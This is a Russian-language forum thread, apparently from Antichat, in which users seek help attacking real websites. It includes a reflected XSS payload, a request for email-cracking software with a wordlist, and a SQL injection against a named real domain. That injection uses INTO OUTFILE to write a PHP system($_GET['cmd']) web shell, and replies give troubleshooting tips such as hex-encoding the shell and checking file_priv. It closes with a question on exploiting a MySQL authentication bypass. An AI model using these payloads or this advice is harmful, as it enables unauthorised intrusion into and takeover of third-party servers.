ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.

Где можно раздобыть хорошую прогу для взлома емейла и плюс хороший словарь?

Блин нифига понять немогу

есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

ver-5.1.22-rc
user-root@localhost

http://danko.dn.ua/admin/fckeditor/_samples/php/

даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь

__________________
Карфаген должен быть разрушен...

попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.

LOAD_FILE есть
file_priv -ок
и шелл кодировать пробовал

буду пробовать залить в базу а потом из базы в файл

Скажите плиз где можно почитать про SSI-уязвимости (Server Side Include)

Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0 %BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B 5)

кто подскажет как это реализовать?

Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.